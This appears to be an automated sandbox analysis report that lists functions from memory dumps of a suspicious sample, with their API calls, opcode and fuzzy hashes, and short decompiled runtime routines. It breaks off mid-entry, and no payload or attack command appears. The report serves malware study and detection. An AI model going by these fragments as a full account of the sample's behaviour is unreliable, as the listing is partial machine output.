                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: b9b3edb82325162ad2af8a2c930318635b324ada5b2a4750e229ff019e637b45
                                                                                                            • Instruction ID: ed64b02b707c67dcf8c18d39f9ee984c66946d8e92ca5b502bec42c1ed62ec9c
                                                                                                            • Opcode Fuzzy Hash: b9b3edb82325162ad2af8a2c930318635b324ada5b2a4750e229ff019e637b45
                                                                                                            • Instruction Fuzzy Hash: AC016D725017009FDB618F56D944B66FFE0EF48324F0888AAED494B616D376E414DB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DBC0E, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(?,00000E38,?,?), ref: 020DBC5E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3660427363-0
                                                                                                            • Opcode ID: c588b3cc4b4407caa79f6b345e550d1465d00ee903883d720203222f96afea39
                                                                                                            • Instruction ID: f5006773c579ea38c1dea3b098aaaeda053d2a2687bd919eddfd0289ed441e48
                                                                                                            • Opcode Fuzzy Hash: c588b3cc4b4407caa79f6b345e550d1465d00ee903883d720203222f96afea39
                                                                                                            • Instruction Fuzzy Hash: 2801A271500605ABD214DF1ADC86B32FBA4FB89B20F14811AED084B741D671F516CAE5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DA682, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 020DA6B4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                            • String ID:
                                                                                                            • API String ID: 2591292051-0
                                                                                                            • Opcode ID: b1603f2e1e552ef739f7851ef3a91628a4619be85718ffd58d84a17c3ac75fcc
                                                                                                            • Instruction ID: 6a964b1f45b24f4a2d4548d8d33e63508f520321f2ded17fae367dba577057dd
                                                                                                            • Opcode Fuzzy Hash: b1603f2e1e552ef739f7851ef3a91628a4619be85718ffd58d84a17c3ac75fcc
                                                                                                            • Instruction Fuzzy Hash: D1018F75601340DFDB508F2AD984766FF94EF04220F08C4AADD498F746D678E444DA62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DAAAA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 020DAADC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                            • String ID:
                                                                                                            • API String ID: 2591292051-0
                                                                                                            • Opcode ID: a4f4ae6737d6a8194f088cf010bfc970d590fd099639bae26b8c24378a304e71
                                                                                                            • Instruction ID: d57efd481588070f57c03182d453f1087e501713213159697a52cc4d906aae1b
                                                                                                            • Opcode Fuzzy Hash: a4f4ae6737d6a8194f088cf010bfc970d590fd099639bae26b8c24378a304e71
                                                                                                            • Instruction Fuzzy Hash: 93017C716013408FDB508F5AD984756BBA4EF44220F08C4AADD498FA46D774E448DA72
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DB872, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • MkParseDisplayName.OLE32(?,00000E38,?,?), ref: 020DB8C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: DisplayNameParse
                                                                                                            • String ID:
                                                                                                            • API String ID: 3580041360-0
                                                                                                            • Opcode ID: 39ec030efc23bf202bf0684c133078461c3a0e5d91f8447f10e229da4586aafe
                                                                                                            • Instruction ID: 82eefade0843340b91d3f255b3321c760fbdae5bee3ad93ff02b32874f2d1032
                                                                                                            • Opcode Fuzzy Hash: 39ec030efc23bf202bf0684c133078461c3a0e5d91f8447f10e229da4586aafe
                                                                                                            • Instruction Fuzzy Hash: 2E01A271500601ABD254DF1ADC86B32FBA4FB89B20F14811AED084B741D631F516CBE5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020DA5EE, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE(?), ref: 020DA620
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919054937.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2340568224-0
                                                                                                            • Opcode ID: a20e41daf28643137d922f14654d14607cd6f0567b53267ac11ba7814c9c560f
                                                                                                            • Instruction ID: 098c70cd9a7aeeeaee3f3e7fcce1a78d187d56bce4bbeca55de2f2581be83f1f
                                                                                                            • Opcode Fuzzy Hash: a20e41daf28643137d922f14654d14607cd6f0567b53267ac11ba7814c9c560f
                                                                                                            • Instruction Fuzzy Hash: F5F0FF39A06340CFDB608F06D884721FFA0EF04320F08C0AADD080F706D3B8A408CAA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B200B0, Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: :@fq
                                                                                                            • API String ID: 0-3673016210
                                                                                                            • Opcode ID: 9653ef1864eab475918077700d359f6ede61ac63a96088374fd75e0ccb08f014
                                                                                                            • Instruction ID: 4bb89877b46d54843983d80763c9b5b0a3f9b5c544230ad903a2ec9163d4fc7a
                                                                                                            • Opcode Fuzzy Hash: 9653ef1864eab475918077700d359f6ede61ac63a96088374fd75e0ccb08f014
                                                                                                            • Instruction Fuzzy Hash: 3BA179347002108FD718EB39C558B6AB7E6FF89715F2581A9E90ACB7A5DE30EC09CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040D4F4, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0040D4F4(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4234b4 = _t6;
				if(_t6 != 0) {
					 *0x4250b0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                                                                                                            0x0040d509
                                                                                                            0x0040d50f
                                                                                                            0x0040d516
                                                                                                            0x0040d51d
                                                                                                            0x0040d523
                                                                                                            0x0040d519
                                                                                                            0x0040d519
                                                                                                            0x0040d519

                                                                                                            APIs
                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D509
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CreateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 10892065-0
                                                                                                            • Opcode ID: b74f0eb7cb2547a527357118f2996512e6bc5046d847e9bf487a9ebd00f7de6a
                                                                                                            • Instruction ID: 0dc2e37081550a42f18de716efddd1270264307755b804b1511d5f7ef129bf73
                                                                                                            • Opcode Fuzzy Hash: b74f0eb7cb2547a527357118f2996512e6bc5046d847e9bf487a9ebd00f7de6a
                                                                                                            • Instruction Fuzzy Hash: 81D05E36A54344AADB115FB07C08B663BDCE388399F404476B90DC6290E678C6418548
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040AD00, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0040AD00(signed int _a8, signed int _a12) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;

				_t5 = E0040B80D(_t6, _t7, _t8, _a8 * _a12); // executed
				return _t5;
			}







                                                                                                            0x0040ad0a
                                                                                                            0x0040ad12

                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 0040AD0A
                                                                                                              • Part of subcall function 0040B80D: __FF_MSGBANNER.LIBCMT ref: 0040B830
                                                                                                              • Part of subcall function 0040B80D: __NMSG_WRITE.LIBCMT ref: 0040B837
                                                                                                              • Part of subcall function 0040B80D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C46,00000001,00000001,00000001,?,0040D62A,00000018,00421240,0000000C,0040D6BB), ref: 0040B884
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 501242067-0
                                                                                                            • Opcode ID: a282ee657e7aaa5f5c0ddda7cc57dbf5e8fdcfd1fb977aee627e67d3a4edbc86
                                                                                                            • Instruction ID: 6152d749c6515609ab02df6ba3058e9eaa89e76363bc4e6266217a4e263958c1
                                                                                                            • Opcode Fuzzy Hash: a282ee657e7aaa5f5c0ddda7cc57dbf5e8fdcfd1fb977aee627e67d3a4edbc86
                                                                                                            • Instruction Fuzzy Hash: 36B012F78046016BC604E690E58280BBBDCEAE0240F81C879F44886070D238E104875B
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004104A0, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004104A0() {
				void* _t1;

				_t1 = E0041042E(0); // executed
				return _t1;
			}




                                                                                                            0x004104a2
                                                                                                            0x004104a8

                                                                                                            APIs
                                                                                                            • __encode_pointer.LIBCMT ref: 004104A2
                                                                                                              • Part of subcall function 0041042E: TlsGetValue.KERNEL32(00000000,?,004104A7,00000000,00413B4E,00423648,00000000,00000314,?,0040EBD1,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410440
                                                                                                              • Part of subcall function 0041042E: TlsGetValue.KERNEL32(00000005,?,004104A7,00000000,00413B4E,00423648,00000000,00000314,?,0040EBD1,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410457
                                                                                                              • Part of subcall function 0041042E: RtlEncodePointer.NTDLL(00000000,?,004104A7,00000000,00413B4E,00423648,00000000,00000314,?,0040EBD1,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410495
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.917594735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000000B.00000002.917652746.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Value$EncodePointer__encode_pointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2585649348-0
                                                                                                            • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                            • Instruction ID: 0ab7d73962414d5186b489697112e47586215f96ab6b5d6f5a678242159ddd99
                                                                                                            • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B200A3, Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: :@fq
                                                                                                            • API String ID: 0-3673016210
                                                                                                            • Opcode ID: 77284c104f13e18f4db196fc469729890f0e9d6ca5953c6fcbffd9fa0bd682ac
                                                                                                            • Instruction ID: cba77993d8a1b1583e3c4d3fa92a90a204f6cf6b863c72b80a246a9492ae861d
                                                                                                            • Opcode Fuzzy Hash: 77284c104f13e18f4db196fc469729890f0e9d6ca5953c6fcbffd9fa0bd682ac
                                                                                                            • Instruction Fuzzy Hash: FE8146347002108FDB18EF79C458B6AB7E6FF89715F2580A9E90ACB7A5DA31EC05CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B28BD8, Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: :@fq
                                                                                                            • API String ID: 0-3673016210
                                                                                                            • Opcode ID: b166948f5cf2b0b66f3cdefb1af7d10bcd85e492c5d6f4bcc82710ef4e963ef2
                                                                                                            • Instruction ID: 4a54fa6335dbd5d6ea2698e9765fe7bea1618531d87e17fae0b1a4c226f68bce
                                                                                                            • Opcode Fuzzy Hash: b166948f5cf2b0b66f3cdefb1af7d10bcd85e492c5d6f4bcc82710ef4e963ef2
                                                                                                            • Instruction Fuzzy Hash: 9D417235F001199FDB14DF69C984AAEBBF2FB89344F1085A9E909EB345DB35E805CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020FA95D, Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919213284.00000000020F5000.00000040.00000001.sdmp, Offset: 020F5000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: rUS
                                                                                                            • API String ID: 0-3819791683
                                                                                                            • Opcode ID: d5c9e1923b443d9f0d65089c86dceb22c5ba08ebd8715be4a047ff5d4fe04dd4
                                                                                                            • Instruction ID: 51eda33ab8eedf3eff782d402e347b044e220115b85f16532b9ac39efd78ddcc
                                                                                                            • Opcode Fuzzy Hash: d5c9e1923b443d9f0d65089c86dceb22c5ba08ebd8715be4a047ff5d4fe04dd4
                                                                                                            • Instruction Fuzzy Hash: 1E21F6B66053046FD7608F06AC45E62FFA8EB85630F08C46FFD499B212D235F504CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B20309, Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: :@fq
                                                                                                            • API String ID: 0-3673016210
                                                                                                            • Opcode ID: 7c5646218cf463ec92d2a70891e42e351849e6fefd5ad8cfaa515a68ea0d99a7
                                                                                                            • Instruction ID: fa4678b0da846115fef9f437c7acf8350eb5451bfc0a33641091138be2971d32
                                                                                                            • Opcode Fuzzy Hash: 7c5646218cf463ec92d2a70891e42e351849e6fefd5ad8cfaa515a68ea0d99a7
                                                                                                            • Instruction Fuzzy Hash: C61184343002149FE714EB39C948B6AB7E6EB89318F2480B9E50ECF7A5DE71EC458751
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B24C79, Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: e
                                                                                                            • API String ID: 0-4024072794
                                                                                                            • Opcode ID: 36d9ae8ed450caa6d8c0a1b94120c5962ad398fbe5b23288719712b7a67f2495
                                                                                                            • Instruction ID: 326e88368cb5eac42e34ef0a4955d2fff3a18f705044383b04fa24e57949648f
                                                                                                            • Opcode Fuzzy Hash: 36d9ae8ed450caa6d8c0a1b94120c5962ad398fbe5b23288719712b7a67f2495
                                                                                                            • Instruction Fuzzy Hash: A3E0BDB4E423288BCBA1CF05C898788FAF5AB84200F2084DA810EA6200E7751B94CF01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B2418A, Relevance: 1.3, Strings: 1, Instructions: 8COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: G
                                                                                                            • API String ID: 0-985283518
                                                                                                            • Opcode ID: 51c7375cd4e60fa775d4a5cdaac2349d323ae41ce2581f76838bd24727cb4ddf
                                                                                                            • Instruction ID: cf0d9c88cc8eaffa8d8fc6f29274269eb8203a6237e4d72e5dc73a9b12170858
                                                                                                            • Opcode Fuzzy Hash: 51c7375cd4e60fa775d4a5cdaac2349d323ae41ce2581f76838bd24727cb4ddf
                                                                                                            • Instruction Fuzzy Hash: FED012B0944238CBDBA0CB04CC98BDAB776BB84300F0040C4C20DA2250DB346E84CF02
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B29760, Relevance: .5, Instructions: 493COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 550e4cbef0bf95c66b02e582c87a9f46772edebd9074e32bced836b446063fa6
                                                                                                            • Instruction ID: d3b9af145b7032a16959aad2eff13c3e543a0418c2028e8baf7885c902ff7c7f
                                                                                                            • Opcode Fuzzy Hash: 550e4cbef0bf95c66b02e582c87a9f46772edebd9074e32bced836b446063fa6
                                                                                                            • Instruction Fuzzy Hash: BE02F170B443518FDB18BB78D55836D7BA3AF85700F148869D50A9B384EE3EAC46CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 024902A2, Relevance: .4, Instructions: 421COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.920064863.0000000002490000.00000040.00000040.sdmp, Offset: 02490000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e75a28166e14f121c6c19fcfcc167996a6665aafcdce33639ab81e7d9bf4a33f
                                                                                                            • Instruction ID: 2bc781abb3bbdc867207e314f3470481809d1c7066ecbf9cb0a1628080588ec2
                                                                                                            • Opcode Fuzzy Hash: e75a28166e14f121c6c19fcfcc167996a6665aafcdce33639ab81e7d9bf4a33f
                                                                                                            • Instruction Fuzzy Hash: E03102A244E3C05FD7138B359C64591BFB0AE93220B0E81DBD8C5CF5A3E22D594ACB32
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020D2477, Relevance: .2, Instructions: 174COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919018023.00000000020D2000.00000040.00000001.sdmp, Offset: 020D2000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4d900e0c16651ee940e082d4e7172375c224563cf5ff978da76aa02d79910710
                                                                                                            • Instruction ID: 8f1eb5b4c658c989cc47395334fb899d8ecac0b73b6f3021503d996b1e71e508
                                                                                                            • Opcode Fuzzy Hash: 4d900e0c16651ee940e082d4e7172375c224563cf5ff978da76aa02d79910710
                                                                                                            • Instruction Fuzzy Hash: 0151B06590F3C19FC7179B348835A547FB0AF57221B4A00CBDC80CF1E7E1696846E366
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 055A04F1, Relevance: .1, Instructions: 138COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.922906675.00000000055A0000.00000040.00000001.sdmp, Offset: 055A0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f2d05e9e544f012ceb59bb311952deb2501133626ec15f2e0f8ca6116dc0bcdd
                                                                                                            • Instruction ID: 79e923a4bea13efca643723ce842b1dcec122c1f3734b12b1e45c705d1d2a556
                                                                                                            • Opcode Fuzzy Hash: f2d05e9e544f012ceb59bb311952deb2501133626ec15f2e0f8ca6116dc0bcdd
                                                                                                            • Instruction Fuzzy Hash: A941B976225200DFDB68CF05D994F3DB7A6FF88320B158459D8068F7B1D634E841CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 055A04AF, Relevance: .1, Instructions: 107COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.922906675.00000000055A0000.00000040.00000001.sdmp, Offset: 055A0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c549726f72801ec90cfb9f3e4dfdf5e45e1640081bdb969baf5c5f2e579932b4
                                                                                                            • Instruction ID: b1072902c29708c4ed5105c6cf1630a28af55978987bfe3974edf1db67ef3525
                                                                                                            • Opcode Fuzzy Hash: c549726f72801ec90cfb9f3e4dfdf5e45e1640081bdb969baf5c5f2e579932b4
                                                                                                            • Instruction Fuzzy Hash: E641D5766083419FD762CF15DC94F66BBB5FF86320F18819AE8458F6A2C234E845CB62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B2A018, Relevance: .1, Instructions: 95COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9d4c5c060089567df932b1888e39007adb0115ac19f78ff61ae9c7e2094aad00
                                                                                                            • Instruction ID: 2a2034bcf5bf9358573358ff2d62d4d8320f91cc357d49cc2afae57e98898a0f
                                                                                                            • Opcode Fuzzy Hash: 9d4c5c060089567df932b1888e39007adb0115ac19f78ff61ae9c7e2094aad00
                                                                                                            • Instruction Fuzzy Hash: AE316274F003189BDB14EFB6D958BAF7AF6AF88744F118828E506E7284DE74D840CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020FA863, Relevance: .1, Instructions: 89COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919213284.00000000020F5000.00000040.00000001.sdmp, Offset: 020F5000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b836aaa8cbeb657f50c35302943e973474f795b41196fbbb2cb5e6b499fa9c5e
                                                                                                            • Instruction ID: b27171f829686bc4ac82dbf922ff2cc5bb7e5240d03ba7d83a61162fba7a1a36
                                                                                                            • Opcode Fuzzy Hash: b836aaa8cbeb657f50c35302943e973474f795b41196fbbb2cb5e6b499fa9c5e
                                                                                                            • Instruction Fuzzy Hash: 6921BFB6509340AFD310CF059C41956FFE8EB89630F08C99EFD899B611D276A805CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 02498C2B, Relevance: .1, Instructions: 76COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.920087990.0000000002496000.00000040.00000040.sdmp, Offset: 02496000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 73713b4974a33589712f94f71ea613d18d62622fffae2b1ffbb47036c9e89a61
                                                                                                            • Instruction ID: f71b5f17e41f878385ecbc222772531f936eb293a919b140a20f3965dc9f544a
                                                                                                            • Opcode Fuzzy Hash: 73713b4974a33589712f94f71ea613d18d62622fffae2b1ffbb47036c9e89a61
                                                                                                            • Instruction Fuzzy Hash: 41312D3014E3C09FC7178B24D9A4B55BF71AF47204F1E85DBD4858F6A3C62A891ACB12
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 04B2A2D8, Relevance: .1, Instructions: 75COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.921313003.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1b4233e18dfa5a5bbaf64d233fd2c96f7c188df996c07e58d58af4be1bf942f8
                                                                                                            • Instruction ID: 8d3ca68928310a4b73f5f0873598e45964cb6cf64ce7ec36f690d6b035680c8f
                                                                                                            • Opcode Fuzzy Hash: 1b4233e18dfa5a5bbaf64d233fd2c96f7c188df996c07e58d58af4be1bf942f8
                                                                                                            • Instruction Fuzzy Hash: D2212B30E14225CFCB28AB79C1546AE7BF5AF8C214F114469D906EB754EF359C41CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020FA88E, Relevance: .1, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919213284.00000000020F5000.00000040.00000001.sdmp, Offset: 020F5000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6b6dcc0da2846803128a0c861cd0862e087f9a3ccb9f94cf019863ff27c2820a
                                                                                                            • Instruction ID: e495b344d0be1ddd1b9193c48b81f4317a1ce3ea049f658b68ad3c3ee3d7edf7
                                                                                                            • Opcode Fuzzy Hash: 6b6dcc0da2846803128a0c861cd0862e087f9a3ccb9f94cf019863ff27c2820a
                                                                                                            • Instruction Fuzzy Hash: 0E216FB6645301AFD350CF0AEC41A57FBE8EB88630F18C96AFD499B311D275E5148BA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 020FA986, Relevance: .1, Instructions: 64COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.919213284.00000000020F5000.00000040.00000001.sdmp, Offset: 020F5000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4d3b2d2d3f11a11ff79a924b6e8c07bcc9fc9515895be79201e4b554e0fd057c
                                                                                                            • Instruction ID: 704ed79f7b8c0aec79d014f9b8ca40015052c4164c8c9dedb172b53f931ba7eb
                                                                                                            • Opcode Fuzzy Hash: 4d3b2d2d3f11a11ff79a924b6e8c07bcc9fc9515895be79201e4b554e0fd057c
                                                                                                            • Instruction Fuzzy Hash: 6A11C276645304BFD7608E0AAC41E62FFA8EB84A30F08C56AFD095B615D272F914CAB1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05443466, Relevance: .1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.922796113.0000000005440000.00000040.00000001.sdmp, Offset: 05440000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 934ab349e8651aba01da9f8a5d9ddf1246602644e1bb049d542964d5478b966f
                                                                                                            • Instruction ID: 58969045e1f3603925d2b198039fc4922a10491b5f05bd2592eb58581ad1485b
